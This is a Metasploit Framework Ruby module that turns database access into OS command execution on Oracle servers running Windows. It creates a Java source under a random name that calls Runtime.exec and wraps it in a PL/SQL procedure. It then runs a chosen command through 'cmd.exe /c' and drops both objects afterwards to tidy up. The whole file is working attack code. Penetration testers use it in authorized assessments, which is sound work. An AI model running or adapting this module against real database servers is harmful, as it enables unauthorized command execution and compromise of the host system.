metasploit-framework/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb

92 lines
2.1 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Java execCommand (Win32)',
'Description' => %q{
This module will create a java class which enables the execution of OS commands.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'https://www.metasploit.com/users/mc' ],
],
'DisclosureDate' => 'Dec 7 2007'))
register_options(
[
OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
], self.class)
end
def run
return if not check_dependencies
source = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
java = "
create or replace and resolve java source named \"#{source}\" as
import java.lang.*;
import java.io.*;
public class #{source}
{
public static void execCommand (String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
};
"
procedure = "
create or replace procedure #{name} (p_command in varchar2)
as language java
name '#{source}.execCommand (java.lang.String)';
"
exec = "begin #{name}('cmd.exe /c #{datastore['CMD']}'); end;"
drops = "drop java source #{source}"
dropp = "drop procedure #{name}"
begin
print_status("Creating java source '#{source}'...")
prepare_exec(java)
rescue => e
return
end
print_status("Creating procedure '#{name}'...")
prepare_exec(procedure)
print_status("Sending command: '#{datastore['CMD']}'")
prepare_exec(exec)
print_status("Removing java source '#{source}'...")
prepare_exec(drops)
print_status("Removing procedure '#{name}'...")
prepare_exec(dropp)
end
end